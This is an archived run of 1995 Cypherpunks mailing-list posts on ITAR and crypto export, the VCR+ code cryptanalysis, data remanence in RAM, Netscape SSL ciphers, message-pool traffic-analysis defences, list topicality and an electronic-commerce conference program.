>I'm not minimizing the issue of export of machine-readable code, as in >diskettes. But to claim that a blurry, printed on cotton "barcode" is even >remotely in the same class as exporting a workable set of cryptographic >system routines, or that letting a furriner merely "gaze upon" this blurry >barcode, is a violation of the ITARs is laughable. Yes, but *many* laws are laughable. >>Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover >>the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then >>flashing it at a furriner could constitute a violation. Thanks for the >>correction. Actually, it was less a correction than me pointing out (yet another) note of uncertainty. James Madison, in Federalist #62 said it best: "What indeed are all the repealing, explaining, and amending laws, which fill and disgrace our voluminous codes, but so many monuments of deficient wisdom." Now, many of us would be more than satisfied to get back to that level of government. I suggest that everyone go have a look at the entire Code of Federal Regulations, before the next election. >the original questioner need not fret about his son wearing the >>shirt to school. I agree that wearing it through Customs on the way to Jamaica would be more problematic, but I live next to a US Customs agent, and he learned about ITAR from me. Here in Miami, Customs has plenty to think about with the various (occasionally venomous) inbound cargo. >It was this series of posts about whether wearing the "munitions t-shirt" >near schools was a crime or not that made me think the silly season had >arrived. It has, a long time ago. Ever watch C-SPAN? 
JMR

Regards,
Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas when the money is left in the hands of TAXPAYERS, God only knows what they do with it. Bake it into pies, probably. Anything to avoid creating jobs. -- Dave Barry
- ------------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James M. Ray
- ------------------------------------------------------------------------
Support Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________

From sandfort at crl.com Mon Sep 4 23:48:23 1995
From: sandfort at crl.com (Sandy Sandfort)
Date: Mon, 4 Sep 95 23:48:23 PDT
Subject: DUMPSTER BONANZA
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

This is not a crypto post, but those interested in threat models and counter-measures might want to read on.

I just looked at the October issue of Soldier of Fortune. In an article entitled "SOF Exposes ATF's Warbirds" the author tells about the 7 to 12 attack aircraft that the BATF has purchased.
Of course, it's interesting to hear how and why this agency decided it needed an airforce to pursue its mission, but the real story for me was how SOF busted them. SOF had heard rumors about a covert operation on the part of the BATF to procure these aircraft. They did their own surveillance of the BATF's phony cover corporation. This included dumpster diving. What they came up with was unbelievable. It included agents' home addresses, the names of family members, official BATF stationery, the works. If you want to read a fascinating tale of BATF incompetence and duplicity, check this one out.

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From dr261 at cleveland.Freenet.Edu Tue Sep 5 00:01:46 1995
From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke)
Date: Tue, 5 Sep 95 00:01:46 PDT
Subject: article/author ratings/reputations (was Re: pseudonyms & list health)
Message-ID: <199509050701.DAA15561@kanga.INS.CWRU.Edu>

This idea of "ratings" over usenet is very interesting.. If anyone has additional info or URLs where I can look, please send me "private" mail at dr261 at cleveland.freenet. (Or post them to the list, but it doesn't seem crypto-related.) Thanks.

--
Tobin Fricke (aka LightRay) The Digital Forest BBS (714)586-6142
dr261 at kanga.ins.cwru.edu KE6WHF Amateur Radio, 1:103/925 fido

From hal9001 at panix.com Tue Sep 5 00:54:29 1995
From: hal9001 at panix.com (Robert A. Rosenberg)
Date: Tue, 5 Sep 95 00:54:29 PDT
Subject: VCRPLUS Huffman code
Message-ID:

At 20:06 9/4/95, Stephen D. Williams wrote:
>It was broken, and I might have the reference in my archives...
>
>If I get time I'll find it.

Why not just do the simple thing and look at Gemstar Development Corporation's Patent for the details.
From cg at bofh.lake.de Tue Sep 5 02:37:38 1995
From: cg at bofh.lake.de (Cees de Groot)
Date: Tue, 5 Sep 95 02:37:38 PDT
Subject: maximizing cryptographic return
In-Reply-To: <8B072A1.00030003E8.uuout@famend.com>
Message-ID:

A non-text attachment was scrubbed... Name: not available Type: application/x-pgp-message Size: 26 bytes Desc: not available URL:

From anon-remailer at utopia.hacktic.nl Tue Sep 5 02:54:36 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Tue, 5 Sep 95 02:54:36 PDT
Subject: SUMMARY: Not-so-volatile volatile memoryRe: SUMMARY: Not-so-volatile volatile memory
Message-ID: <199509050954.LAA15934@utopia.hacktic.nl>

> -- Summary: Data retention in semiconductor memory --
>
> Contrary to conventional wisdom, "volatile" semiconductor memory does not entirely lose its contents when power is removed. Both static (SRAM) and dynamic (DRAM) memory retain some information on the data stored in it while power was still applied. SRAM is particularly susceptible to this problem, as storing the same data in it over a long period of time has the effect of altering the preferred power-up state to the state which was stored when power was removed. Older SRAM chips could often "remember" the previously held state for several days. In fact, it is possible to manufacture SRAM's which always have a certain state on power-up, but which can be overwritten later on - a kind of "writeable ROM".

Is this a new discovery? When I used to work with DOD classified data, not so long ago, disk drives had to be declassified using an approved program, such as Norton Utilities' "WIPEINFO". (That was approved up through the SECRET/SAR level, anyway. I don't know about TS/SCI/SI.) But those same regulations said that RAM was considered declassified within a certain time (30 seconds, I think) after power was removed. (That time figure was UNclassified, BTW.)
I think it was just to allow time for the voltage to bleed off of the power supply's filter capacitors, and not related to the relative volatility of DRAM.

From trei at process.com Tue Sep 5 07:35:31 1995
From: trei at process.com (Peter Trei)
Date: Tue, 5 Sep 95 07:35:31 PDT
Subject: VCRPLUS Huffman code
Message-ID: <9509051435.AA15596@toad.com>

> Has anyone worked out the VCRPLUS code?

It was partially broken a few years ago, and the results published in Cryptologia. I have a xerox in a carton somewhere. The break was for codes up to 4 or 5 digits long, if I recall - this covers most of the major timeslots on the main stations. Longer codes cover odd timeslots on less popular stations. Code which implemented this partial crack was published on the net, and the VCR+ people got very upset about it - apparently they make money selling the codes to TV Guide and newspapers. It's protected as a trade secret, not a patent. It used a combination of lookup tables and Huffman codes, and included a certain amount of obfuscation to resist cracking.

Peter

Peter Trei
Senior Software Engineer
Purveyor Development Team
Process Software Corporation
http://www.process.com
trei at process.com

From trei at process.com Tue Sep 5 07:46:52 1995
From: trei at process.com (Peter Trei)
Date: Tue, 5 Sep 95 07:46:52 PDT
Subject: Non-US SSL128 site
Message-ID: <9509051446.AA16057@toad.com>

> > a) Use 128 bit SSL if the client allows it.
> > b) Tell users which cipher is being used on a secure session.
> Netscape's press release on the RC4-40 crack seems to have disappeared from their home page, but I don't remember any specific mention of 128-bit U.S.-only clients, just servers.
> So what's up?
Netscape sells a 128-bit US-only client for $39

Peter

Peter Trei
Senior Software Engineer
Purveyor Development Team
Process Software Corporation
http://www.process.com
trei at process.com

From adam at bwh.harvard.edu Tue Sep 5 07:55:29 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Tue, 5 Sep 95 07:55:29 PDT
Subject: Non-US SSL128 site
In-Reply-To: <9509051446.AA16057@toad.com>
Message-ID: <199509051449.KAA13448@joplin.bwh.harvard.edu>

| Netscape sells a 128-bit US-only client for $39

Does the US only server also do des, 3des and IDEA, or just rc4-128?

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From jeffb at sware.com Tue Sep 5 08:12:35 1995
From: jeffb at sware.com (Jeff Barber)
Date: Tue, 5 Sep 95 08:12:35 PDT
Subject: Non-US SSL128 site
In-Reply-To: <199509051449.KAA13448@joplin.bwh.harvard.edu>
Message-ID: <9509051506.AA09665@wombat.sware.com>

Adam Shostack writes:
> | Netscape sells a 128-bit US-only client for $39
> Does the US only server also do des, 3des and IDEA, or just rc4-128?

Yes. It does:
RC4 - 128
RC4 - 40
RC2 - 128
RC2 - 40
IDEA
DES, "64 bits"
DES "with EDE 3, 192 bits"

-- Jeff

From asgaard at sos.sll.se Tue Sep 5 09:33:35 1995
From: asgaard at sos.sll.se (Mats Bergstrom)
Date: Tue, 5 Sep 95 09:33:35 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To:
Message-ID:

Black Unicorn posted a very interesting info summary on the subject of foreign state US$$ forgery. This is a story I heard, long ago, from a Brit, Mr Waterlow, about something that happened to his grandfather, chairman of the Waterlow bank: Early in this century Portugal didn't print its own money but contracted this job to the Waterlow Bank in England. Some skilled conmen succeeded in making the bank believe they were representatives of the Portuguese National Bank. Then they ordered a huge amount of new bills and got away (at least for some time) with it.
Now, the point is that this was actually GOOD for the Portuguese economy, the real National Bankers having underestimated the optimal size of their cash stock. So, I wonder, perhaps the world economy might benefit from some Iranian additions to the number of $$ around? A Keynesian boost? Just drifting (I know very little about economy...).

Mats

From andrew_loewenstern at il.us.swissbank.com Tue Sep 5 09:45:12 1995
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Tue, 5 Sep 95 09:45:12 PDT
Subject: Emergency File Wipe Algorithim
Message-ID: <9509051644.AA00586@ch1d157nwk>

Peter Gutmann writes in an article quoted by Christian Wettergren
> The greater the amount of time that new data has existed in the cell, the more the old stress is "diluted", and the less reliable the information extraction will be. Generally, the rates of change due to stress and relaxation are in the same order of magnitude. Thus, a few microseconds of storing the opposite data to the currently stored value will have little effect on the oxide.

Phill Hallam writes:
> If the power is cycled as opposed to turned off only then a memory self test program will probably erase the data.

Assuming Peter Gutmann is correct, a memory test program "probably" won't do much. Of course, your data must be worth quite a pretty penny for an attacker to attempt to recover data from the oxides on the cells in your RAM.

andrew

From tcmay at got.net Tue Sep 5 09:46:15 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 5 Sep 95 09:46:15 PDT
Subject: "This discussion is off-topic, please take it elsewhere"
Message-ID:

At 5:58 AM 9/5/95, Sandy Sandfort wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> >C'punks, > >This is not a crypto post, but those interested in threat models >and counter-measures might want to read on. This brings up an important issue. Sorry it is not written in C, or even TCL. I actually agree with a point the noted tentacle VZNuri ("visionary," obviously) wrote, namely, that people are getting entirely too apologetic (myself included, though most of my "apologies" have had an ironic edge to them) about posting things that are other than about coding in C, writing sockets for Windows, or breaking SSL. Folks, this list is about a _lot more_ than just some facet of writing software. It started as a wide-ranging list, with many topics, many interests. I don't think I need to try to list the topics, but they obviously include things such as legal issues, policy, PGP, remailers, digital money, money laundering, regulatory arbitrage, data havens, steganography, languages, frameworks, Unix utilities, and dozens of other related topics. We've covered hundreds of topics, and are probably the only such list on the planet that routinely considers the ramifications and ways of actually building the exciting ideas that the academics at the Crypto conferences discover and write about. (I can tell you that one of the main motivations we (Eric and I) had in starting the group was to take the academic abstractions, things like "bit commitment" and "dining cryptographers networks" and reify them into actual blocks of code, or running programs.) Some have argued that "Cypherpunks write code," which has been a short slogan making it clear that one of our main interests is in actually building and deploying these methods. This was a major goal in the spring of 1992 when Eric (Hughes, for any newcomers) and I spent time hashing out what is needed in crypto. As far as I'm concerned, we're on track. Remailers have advanced far beyond the early remailers, and that they exist at all is an accomplishment. 
The "theory" of remailers is immensely accelerated by having actual remailers in actual use to test theories against and to see real world behaviors. Likewise, message pools have been built. A working anonymous market (BlackNet, for example) has been instantiated, albeit not proliferated. Digital money in various forms (Magic Money, work with Chaum's DigiCash, etc.) has been used. Lots of other examples. PGP, hooks to mail programs (though a lot more are needed), key escrow considerations, etc. Of course, things have gone more slowly in some areas than in others. Digital money, and financial instruments in general, have proceeded in fits and starts. I suspect this indicates that things like money are not done lightly, and that many non-coding issues are intertwined in such a way as to make any "amateur" efforts problematic. But it's only through trying that the obstacles can be seen, so even our failures are useful. Is this "writing code" in all cases? Of course not. Not everything is coding. Planning and preparing is just as important. And consideration of threat models is part and parcel of writing code, else one will not know where to start writing code. Thus, for example, the hundreds of posts here on key escrow (and some of us anticipated Clipper six months before it was announced, allowing the Cypherpunks to hit the ground running as soon as it was announced) and GAK are useful in countering the arguments of those who have spent years planning such escrow (GAK) policies. What I'm getting at is that the "Cypherpunks write code" mantra does not mean that _only_ the few dozen folks actively writing C code can contribute. Indeed, many of the folks now writing code have _claimed_ that they were inspired to write some code in some area--remailers, digital cash, SSL challenges, whatever--by the discussions here on this list. 
Would they have been so inspired if all political, legal, and cultural discussions had been expunged, if only the arcana of programming and C were being discussed? After all, sci.crypt already exists, and even sci.crypt.research, so why should the Cypherpunks list even exist, as these groups are already ostensibly focussed on pure crypto issues.

No, Cypherpunks is about more than just C programming, about more than just IETF issues, about more than just algorithms. I think it great that so much programming discussion occurs, that so much progress is being made. I just think some list.cops are going a bit overboard in their denunciations of "off-topic" posts, and their increasing shrillness in saying that anyone not out there writing Unix crypto programs should stop posting. Those who only want to read about "malloc" and "struct" are encouraged to use the filtering tools which they surely have access to and to stop telling us in shrill voices that posts are "off-topic."

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Tue Sep 5 10:02:53 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 5 Sep 95 10:02:53 PDT
Subject: SUMMARY: Not-so-volatile volatile memory
Message-ID:

At 9:54 AM 9/5/95, Anonymous wrote:
>> -- Summary: Data retention in semiconductor memory --
>>
>> Contrary to conventional wisdom, "volatile" semiconductor memory does not entirely lose its contents when power is removed. Both static (SRAM) and dynamic (DRAM) memory retain some information on the data stored in it while power was still applied.
>> SRAM is particularly susceptible to this problem, as storing the same data in it over a long period of time has the effect of altering the preferred power-up state to the state which was stored when power was removed. Older SRAM chips could often "remember" the previously held state for several days. In fact, it is possible to manufacture SRAMs which always have a certain state on power-up, but which can be overwritten later on - a kind of "writeable ROM".
>
> Is this a new discovery? When I used to work with DOD classified data, not so long ago, disk drives had to be declassified using an approved program, such as Norton Utilities' "WIPEINFO". (That was approved up through the SECRET/SAR level, anyway. I don't know about TS/SCI/SI.) But those same regulations said that RAM was considered declassified within a certain time (30 seconds, I think) after power was removed. (That time figure was UNclassified, BTW.) I think it was just to allow time for the voltage to bleed off of the power supply's filter capacitors, and not related to the relative volatility of DRAM.

The Gutmann article was discussing residual/remnant storage a lot more subtle than the usual "bleed-off" characteristics.

One interesting twist is using radiation sources to "snapshot" or "freeze" the internal contents of dynamic RAM. I worked with DRAMs for more than a decade at Intel, though never on this particular issue. But I read a lot of the public papers on radiation effects on DRAMs, including the "freezing" of data patterns into DRAMs by exposure. (I recall thinking at the time, circa 1980, that someday raids on computers could involve bringing in flash radiation sources to "snapshot" the contents of DRAM.)

Sandia Labs did a lot of the work on this, and results are reported at the annual Nuclear and Space Radiation Effects Conference. The December issue of "IEEE Transactions on Nuclear Science" every year includes the proceedings of this conference.
Any large university library should have it.

It's also possible to literally freeze a DRAM--with "Arctic Freeze" spray, for example--and stop the self-discharge of DRAM cells.

I doubt any of these efforts are being used, though. Looking at how raided computers are simply carted off in the backs of pickup trucks, with disk drives thrown in with monitors, I suspect nothing this sophisticated has ever been tried. Quantico might have some more sophisticated approaches, but they're not publicly discussing them.

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From cman at communities.com Tue Sep 5 10:33:28 1995
From: cman at communities.com (Douglas Barnes)
Date: Tue, 5 Sep 95 10:33:28 PDT
Subject: Slightly faster checking for encrypted messages to me

Hal --

I've actually given this some thought in the past, and the most practical solution IMHO is much lower tech, although it only works on non-initial messages in a correspondence.

If two entities want to communicate via a message pool, without worrying about traffic analysis, but don't want the overhead of trying to decrypt every headerless message to the pool, then they can do the following:

1) In a "headered" message, one of the entities (A) sends a collection of large random numbers to be used as return markers, encrypted with the public key of the desired correspondent (B).

2) B can then respond to A with an essentially headerless message prefixed with one of the numbers sent by A. This initial message should contain a list of similar numbers for B, that A can use to send messages to B.
3) Numbers are only used once; entities can now quickly scan the message pool by hashing the initial N bits of each message into a lookup table seeded with all the remaining random return markers they've distributed.

4) As an extension, you can divide your message pools into "initial contact" pools, which would begin with headerless public key encrypted blocks, and "conversation" pools that would begin with return markers. (Of course this is trivially open to denial of service attacks.)

This is the basic principle behind the TA-resistant streams over UDP stuff I wrote up for cypherpunks last spring, except in that case a given server does the lookup first, and only then tries to treat the header as a public key encrypted block instead of a MAC.

The Rabin stuff is a step in the right direction for the long term, however.

From dneal at usis.com Tue Sep 5 10:43:21 1995
From: dneal at usis.com (David Neal)
Date: Tue, 5 Sep 95 10:43:21 PDT
Subject: A recent article on Electronic Commerce

In the August 28, 1995 issue of Communications Week, the editor Mitch Irsfield briefly discusses electronic checking, and the joint venture between Sun, BBN, IBM, et al. He also references an article explaining the venture on Page 5 of the same issue.

I dropped him a quick note thanking him for writing a non-hysterical article on cryptography, and also briefly mentioned that some of us would prefer electronic cash to electronic checking. Since part of being a cypherpunk is political, I'd like to encourage everyone to write a quick e-mail which expresses your own views to Mr. Irsfield (678-7017 at mcimail.com).

Speaking of talking to the 'public' about crypto-cash, we really need a meme of our own. Just as The Other Side invokes the specters of terrorism and child pornography, we need something like 'traceable transactions', 'government approved checking', 'uncle sam's clearing house', or 'irs approved bill payments.'
Obviously the creative types on the list can come up with much better. But, I digress.

The Page 5 article doesn't go into much detail, but says in essence that the system is an api layer and a smart card. In the cases of larger corporations, they may require a separate processor. This says 'encryption in hardware' to me. Gee, wonder if someone found a use for all those useless tessera cards after all? :-)

David Neal - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant.
"...you have a personal responsibility to be pro-active in the defense of your own civil liberties." - S. McCandlish

From markm at omni.voicenet.com Tue Sep 5 11:11:08 1995
From: markm at omni.voicenet.com (Mark M.)
Date: Tue, 5 Sep 95 11:11:08 PDT
Subject: VCRPLUS Huffman code
In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net>

On Mon, 4 Sep 1995 bplib at nic.wat.hookup.net wrote:

> I too would be interested in the VCRPlus code. Has anyone broken it?
> Tim Philp

You can get the source code to VCR+ encoding and decoding at ftp://sable.ox.ac.uk/pub/crypto/cryptanalysis/vcr+.shar.gz

From dr261 at cleveland.Freenet.Edu Tue Sep 5 11:22:45 1995
From: dr261 at cleveland.Freenet.Edu (Tobin T Fricke)
Date: Tue, 5 Sep 95 11:22:45 PDT
Subject: [trei@process.com: Re: VCRPLUS Huffman code]
Message-ID: <199509051806.OAA03038@kanga.INS.CWRU.Edu>

================= Begin forwarded message =================
From: trei at process.com (Peter Trei)
To: miniters at citadel.edu, cypherpunks at toad.com
Subject: Re: VCRPLUS Huffman code
Date: Tue, 05 Sep

> Has anyone worked out the VCRPLUS code?

It was partially broken a few years ago, and the results published in Cryptologia. I have a xerox in a carton somewhere. The break was for codes up to 4 or 5 digits long, if I recall - this covers most of the major timeslots on the main stations. Longer codes cover odd timeslots on less popular stations.
Code which implemented this partial crack was published on the net, and the VCR+ people got very upset about it - apparently they make money selling the codes to TV Guide and newspapers. It's protected as a trade secret, not a patent. It used a combination of lookup tables and Huffman codes, and included a certain amount of obfuscation to resist cracking. Peter Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com -- Tobin Fricke (aka LightRay) The Digital Forest BBS (714)586-6142 dr261 at kanga.ins.cwru.edu KE6WHF Amateur Radio, 1:103/925 fido From trei at process.com Tue Sep 5 11:53:33 1995 From: trei at process.com (Peter Trei) Date: Tue, 5 Sep 95 11:53:33 PDT Subject: SSL trouble Message-ID: <9509051853.AA21783@toad.com> > >I did a distributed scheme for something else that had two levels, a master > >and a group of slaves. Only the slaves talked to the master. For this > >effort I think a variation of the idea would be better. Have all of the > >brutes contact the master, who will, in the first transaction assign them > >to the next slave in a round-robin fashion. > Why not just have the brutes pick a slave at random? Of course, you need > to give them a complete list of slaves to choose from. But then the only > difference between the master and the slaves will be that the master > doesn't get any keyspace (it's got it all to begin with) and doesn't > report any results upward. This is starting to sound like alt.sex.bondage.... Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From blane at eskimo.com Tue Sep 5 12:07:37 1995 From: blane at eskimo.com (Brian Lane) Date: Tue, 5 Sep 95 12:07:37 PDT Subject: VCRPLUS Huffman code In-Reply-To: <9509051435.AA15596@toad.com> Message-ID: On Tue, 5 Sep 1995, Peter Trei wrote: > > > Has anyone worked out the VCRPLUS code? 
> > Code which implemented this partial crack was published on the net,
> and the VCR+ people got very upset about it - apparently they make

I believe the code is in the cookbook archive at ftp.ee.ualberta.ca, but when I just tried to confirm I got timeouts.

Brian
------------------------------------------------------------------------------
ftp.eskimo.com/blane | | www.eskimo.com/~blane
------------------------------------------------------------------------------

From wec at dallas.net Tue Sep 5 10:17:54 1995
From: wec at dallas.net (Fred Sammet)
Date: Tue, 5 Sep 1995 12:17:54 -0500
Subject: response (fwd)

>> What we need is for Fred to send to you a copy of the
>> program in electronic form (I'm waiting for the too -- then I can
>> highlight the important sessions for you.

ANNOUNCING: The Second Annual . . .

WORLDWIDE ELECTRONIC COMMERCE
Law, Policy, Security & Controls Conference
October 18-20, 1995
At the Hyatt Regency Bethesda
Phone: (214) 516-4900

The Second Annual WorldWide Electronic Commerce; Law, Policy, Security and Controls conference is fast approaching. This important event will feature the world's foremost experts addressing the most important issues of implementation and control related to secure electronic commerce. It will focus on current problems and provide a foundation for dealing with the emerging problems that promise to make the future more complex.

We have been fortunate in securing a faculty that is unusually qualified and internationally recognized who will share their experience, knowledge and theories on the wide range of issues being addressed by this program. We are equally pleased to have obtained affiliation for this conference of a number of prestigious and influential organizations.
Please join us and your colleagues at this unique event!

Michael S. Baum, J.D., M.B.A.
Conference Chair

Provided in Affiliation with:
=============================================
* American Bar Association Section of Science and Technology Information Security Committee
* University of London Queen Mary & Westfield College Centre for Commercial Law Studies
* EDI Association of the United Kingdom
* Harvard Law School
* International Union of Latin Notaries
* International Chamber of Commerce, Paris
* National Institute of Standards and Technology (NIST)
* Software Publishers Association
* United Nations Commission on International Trade Law (UNCITRAL)
* U.S. Council of International Business
=============================================

Keynote Speaker:
----------------
Dr. Vinton G. Cerf, Ph.D.
Senior Vice President
MCI Telecommunications Corp.

CONFERENCE PROGRAM ...at a glance

GENERAL SCHEDULE
-------------------------------------------------
Wednesday, October 19, 1995
  6:00pm - 7:30pm  SECURE ELECTRONIC COMMERCE FOR THE BEGINNER
Thursday, October 20, 1995
  8:00am - 9:00am  Welcome & Keynote Speech
  9:00am - 5:50pm  Sessions 1 - 5
Friday, October 21, 1995
  8:00am - 4:50pm  Sessions 6 - 10

----------------------------------------------
TRACK - A
AGREEMENTS, LEGISLATION, POLICY AND REGULATION
----------------------------------------------
Session 1  So Who's in Charge, Anyway? The Impact of National & Int'l Leadership & Initiatives in Secure EC
  SPEAKERS: Harold S Burman, Esq., Office of the Legal Advisor; Sally Katzen, Office of Management and Budget; Bruce McConnell, Office of Management & Budget; Renaud Sorieul, Esq., UNCITRAL
Session 2  Drafting Agreements for Secure Electronic Commerce
  SPEAKERS: Michael S Baum, Esq., Independent Monitoring; Thomas J Smedinghoff, Esq., McBride Baker & Coles; Joe Wackerman, Esq., United States Postal Service
Session 3  Are Privacy Requirements Inhibiting Electronic Commerce?
  SPEAKERS: Kenneth C Bass III, Esq., Venable, Baetjer, Howard & Civiletti; Prof. George Trubow, The John Marshall Law School; Ian Walden, Ph.D., Commission of the European Communities
Session 4  Alternative Methods of Signing: Legal Aspects of the IRS's July 1995 Regulation
  SPEAKERS: Tom Baker, Esq., Internal Revenue Service; Lynn Casimir, Esq., Internal Revenue Service; Celia Gabrysh, Esq., Internal Revenue Service
Session 5  Digital Signature Legislation and Electronic Commerce
  SPEAKERS: Alan Asay, Esq., Utah Department of Commerce; Kirk W Dillard, Esq., State Senator, State of Illinois; Dean Sutherland, State Senator, Washington State; William E. Wyrough, Jr., J.D., M.B.A., Florida Legislature
Session 6  The Legal Status and Effect of Digital Signatures - Perspectives
  SPEAKERS: Prof. Mads Andersen, University of Copenhagen; Mario Miccoli, International Union of Latin Notaries
Session 7  On-Line Registration vs. In-Person Registration: What Satisfies Business and Legal Requirements?
  SPEAKERS: Phillip Hallam-Baker, Massachusetts Institute of Technology; Jeff Treuhaft, Netscape Communications Corporation; Peter Williams, Verisign
Session 8  Antitrust in Electronic Commerce: Shopping, Payments & Certification Authorities
  SPEAKERS: Prof. Mads Andersen, University of Copenhagen; John Greanley, Esq., US Department of Justice, Antitrust Division
Session 9  Proving Secure Computer-Based Transactions: Evidence Revisited
  SPEAKERS: Margaret A Berger, Brooklyn Law School; Charles Nesson, Harvard Law School; Ian Walden, Ph.D., Commission of the European Communities
Session 10  Third Party Service Providers & Certification Authorities - Can They Successfully Limit their Liability
  SPEAKERS: Bruce Hunter, Esq., General Electric Information Services; Ellen Kirsh, Esq., America On Line; Renaud Sorieul, Esq., UNCITRAL

--------------------
TRACK - B
INFORMATION SECURITY
--------------------
Session 1  Requirements for Implementing Reasonable Security Procedures
  SPEAKERS: Robert Daniels, Esq., U.S. Social Security Administration; Dain Gary, Morgan Stanley; Allan M Shiffman, Terisa Systems, Inc.
Session 2  Information Security Standards: Policy, Coordination & Interoperability
  SPEAKERS: Marty Ferris, US Department of Treasury; Hoyt Kesterson II, Bull Worldwide Information Systems; Peter Landrock, Ph.D., CRYPTOMATHIC; David Solo, Bolt, Beranek and Newman
Session 3  Who's Really on the Other End: Identification Technologies and Nonrepudiation
  SPEAKERS: Benjamin Miller, Personal Identification News; John E Siedlarz, IriScan, Inc.; William Sweet, National Semiconductor
Session 4  Security and Security Policy in Internet-based Payments Systems
  SPEAKERS: Marty Ferris, US Department of Treasury; Tim Jones, Mondex; Anne Wallace, US Department of Treasury
Session 5  When You Forget Your PIN or Die: Key Escrow in Secure Electronic Commerce
  SPEAKERS: Prof. Michael Froomkin, University of Miami School of Law; Jeff Greiveldinger, US Department of Justice, Criminal Div.; Frank W Sudia, Bankers Trust Company
Session 6  Comparing Critical Cryptographic Algorithms, Protocols, and Standards to Enable Secure Electronic Commerce
  SPEAKERS: Peter Landrock, Ph.D., CRYPTOMATHIC; Ron Rivest, Massachusetts Institute of Technology; Miles E Smid, National Institute of Standards & Tech.
Session 7  Export Controls & Transborder Data Flows: Is Secure Electronic Commerce in Jeopardy?
  SPEAKERS: James Bidzos, RSA Data Security; Renee H Danckwerth, Export Consultant
Session 8  'Certificates-R-US': Trust Models and the Developing Secure Information Infrastructure
  SPEAKERS: Warwick Ford, Bell-Northern Research; Sead Muftic, COST Computer Security Technologies; Peter Williams, Verisign
Session 9  Professional Accreditation and Certification - The New Frontier in 'Remote Trust'
  SPEAKERS: Richard C Koenig, Int'l Info. Sys. Security Cert. Consort.; Alan M Schwartz, Esq., American Bar Association
Session 10  Looking into the Crystal Ball: Certificates Revisited
  SPEAKERS: Web Augustine, VeriSign, Inc.; Warwick Ford, Bell-Northern Research; Hoyt Kesterson II, Bull Worldwide Information Systems

-------------------------------------------
TRACK - C
LEGAL ASPECTS OF SECURE ELECTRONIC COMMERCE
-------------------------------------------
Session 1  Do Criminal Laws Really Protect Electronic Commerce?
  SPEAKERS: Scott Charney, Esq., US Department of Justice; William J Cook, Brinks, et al.; Richard A Ress, Federal Bureau of Investigation
Session 2  Who Owns the Information, Standards, Certificates and Cryptographic Keys?
  SPEAKERS: Peter Harter, National Public Telecomputing Network; David W Maher, Esq., Sonnenschein Nath & Rosenthal; James Powers, Esq., Shulman, Rogers et al.
Session 3  Consumers on the Net - Fairness, Conspicuousness, Notice, and Reliance
  SPEAKERS: Nessa Eileen Feddis, Esq., Government Relations/Retail Banking; Ray Nimmer, Esq., Weil, Gotshal & Manges
Session 4  Electronic Licensing and Distribution of Digital Content: Downloading for Liability?
  SPEAKERS: James C McKay, Jr., Office of the Corporation Counsel, D.C.; Thomas J Smedinghoff, Esq., McBride Baker & Coles; Mark Traphagen, Software Publishers Association
Session 5  Insuring Electronic Commerce Transactions and Infrastructure
  SPEAKERS: Andrew Cockrane, Alexander & Alexander; Norman R Nelson, New York Clearing House Association
Session 6  Auditing a Third Party/Value Added Network or Certification Authority (and Its Implications)
  SPEAKERS: Charles H LeGrand, CIA, Institute of Internal Auditors; John Stelzer, COMMERCE:Institute
Session 7  Electronic Recordkeeping - What to Save, When and How to Save It, and for How Long
  SPEAKERS: Lynn Casimir, Esq., Internal Revenue Service; Celia Gabrysh, Esq., Internal Revenue Service; Claude Perreault, Chambre des notaires du Quebec
Session 8  Disaster and Contingency Planning Services: What is Needed for EC and Certification Authorities
  SPEAKERS: Dain Gary, Morgan Stanley; Ake Nilson, Marinade Limited; Helena Roine-Taylor, The Finnish Data Communication Assoc. FINPRO; David Solo, Bolt, Beranek and Newman
Session 9  General Counsel's Forum on Computer-Based Trade
  SPEAKERS: Robert W Barger, Esq., AT&T; Bruce Hunter, Esq., General Electric Information Services; Ellen Kirsh, Esq., America On Line
Session 10  An Audit Model for Your Electronic Commerce Infrastructure
  SPEAKERS: Gerald R Bielfeldt, NationsBank; Phillip Oddo, Ciba-Geigy; Horton Sorkin, Ph.D., Howard University

------------------------------
TRACK - D
INFRASTRUCTURAL CONSIDERATIONS
------------------------------
Session 1  Securely Shopping on the Web: New Paradigms, Protocols and Opportunities
  SPEAKERS: Jeff Hilt, VISA International; Todd Ostrander, Egghead Software
